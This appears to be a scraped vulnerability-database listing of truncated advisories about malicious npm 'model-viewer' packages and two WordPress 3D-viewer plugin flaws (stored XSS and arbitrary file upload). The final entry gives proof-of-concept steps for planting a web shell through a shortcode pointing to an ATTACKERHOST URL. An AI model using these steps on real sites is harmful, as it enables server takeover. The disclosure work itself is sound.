Malicious Package

Overview @awan7715/model-viewer-space-opera is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and...

Malicious Package

Overview model-viewer-space-opera is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this...

EUVD-2024-28479

Malicious code in bioql PyPI...

Malicious code in model-viewer-docs (npm)

--- -= Per source details. Do not edit below this line.=-...

MAL-2025-47689 Malicious code in model-viewer-docs (npm)

--- -= Per source details. Do not edit below this line.=-...

CVE-2024-30559

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2023-4311

The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...

MAL-2025-853 Malicious code in model-viewer-space-opera (npm)

--- -= Per source details. Do not edit below this line.=-...

Malicious code in model-viewer-space-opera (npm)

--- -= Per source details. Do not edit below this line.=-...

Malicious code in model-viewer-render-fidelity-tools (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1109626e5ba207b2f14c0b5c9081c8b4dd49932d296464a13921731b5749a51c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in @awan_7715/model-viewer-space-opera (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis e555e285993ff5179f3dad8424c83097053d02d6b4a91a72319eaabb6f1e6282 The OpenSSF Package Analysis project identified '@awan7715/model-viewer-space-opera' @ 1.1.1 npm as malicious. It is considered malicious becaus...

CVE-2024-30559

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2024-30559

CVE-2024-30559 is a cross-site scripting (Stored XSS) vulnerability reported in the Spin 360 deg and 3D Model Viewer WordPress plugin. The CVE entry notes the flaw affects Spin 360 deg and 3D Model Viewer versions from an unspecified baseline up to 1.2.7. The linked Red Hat entry reiterates the i...

WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by LVT-tholv2k Patchstack Alliance in WordPress Plugin Spin 360 deg and 3D Model Viewer versions = 1.2.7...

WordPress Spin 360 deg and 3D Model Viewer Plugin <= 1.2.7 is vulnerable to Cross Site Scripting (XSS)

Software Spin 360 deg and 3D Model Viewer Type Plugin Vulnerable versions = 1.2.7 Fixed in N/A OWASP Top 10 A3: Injection Classification Cross Site Scripting XSS CVE CVE-2024-30559 Patch priority Low CVSS severity Low 6.5 Developer Claim ownership PSID 26eafe92fc92 Credits LVT-tholv2k Required...

CVE-2023-4311

CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...

WordPress Plugin Vrm 360 3D Model Viewer Security Vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPres...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...